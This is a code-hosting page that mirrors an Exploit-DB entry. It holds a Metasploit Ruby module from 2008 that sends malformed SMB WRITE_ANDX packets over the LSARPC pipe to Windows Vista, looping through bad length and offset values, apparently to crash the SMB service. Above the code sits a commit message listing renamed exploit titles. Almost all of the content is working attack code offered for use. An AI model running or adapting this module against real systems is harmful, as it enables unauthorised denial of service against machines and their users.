bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/6463.rb
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

159 lines
3.9 KiB
Ruby
Executable file
Raw Blame History

require 'msf/core'
module Msf
module Exploits
module Test
class BugTest < Msf::Exploit::Remote
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'test exploit',
'Description' =>
"tests",
'Author' => 'tests',
'License' => MSF_LICENSE,
'Version' => '$Revision: 0 $',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000
},
'Targets' =>
[
[
'Windows VISTA',
{
'Platform' => 'win'
}
],
],
'DefaultTarget' => 0))
end
def subexploit(dlenlow, doffset,fillersize)
print_line("1")
datastore['SMBUser']='testuser'
datastore['SMBPass']='testuser'
datastore['SMBDomain']='COBAYA'
datastore['SMBName']='COBAYA'
print_line("2")
connect()
print_line("3")
smb_login()
print_line("4")
pkt = CONST::SMB_CREATE_PKT.make_struct
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc807
pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX
pkt['Payload']['SMB'].v['WordCount'] = 24
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['AndXOffset'] = 0xdede
pkt['Payload'].v['FileNameLen'] = 14
pkt['Payload'].v['CreateFlags'] = 0x16
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0x400040
pkt['Payload'].v['Impersonation'] = 2
pkt['Payload'].v['Disposition'] = 1
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
simple.client.smb_send(pkt.to_s)
print_line("5")
ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)
pkt = CONST::SMB_WRITE_PKT.make_struct
data_offset = pkt.to_s.length - 4
print_line("6")
filler = Rex::Text.rand_text(fillersize)
print_line("7")
pkt['Payload']['SMB'].v['Signature1']=0xcccccccc
pkt['Payload']['SMB'].v['Signature2']=0xcccccccc
pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc807
pkt['Payload']['SMB'].v['WordCount'] = 14
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['AndXOffset'] = 0xdede
pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
pkt['Payload'].v['Offset'] = 0
pkt['Payload'].v['Reserved2'] = -1
pkt['Payload'].v['WriteMode'] = 8
pkt['Payload'].v['Remaining'] = fillersize
pkt['Payload'].v['DataLenHigh'] = 0
pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
pkt['Payload'].v['DataOffset'] = doffset #<====
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
pkt['Payload'].v['ByteCount'] = fillersize#<====
pkt['Payload'].v['Payload'] = filler
print_line("8")
simple.client.smb_send(pkt.to_s)
print_line("9")
end
def exploit
k=72
j=0xffff
while j>10000
i=0xffff
while i>10000
begin
print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
subexploit(i,j,k)
rescue
print_line("rescue")
end
i=i-10000
end
j=j-10000
end
end
end
end
end
end
# milw0rm.com [2008-09-15]
Reference in a new issue View git blame Copy permalink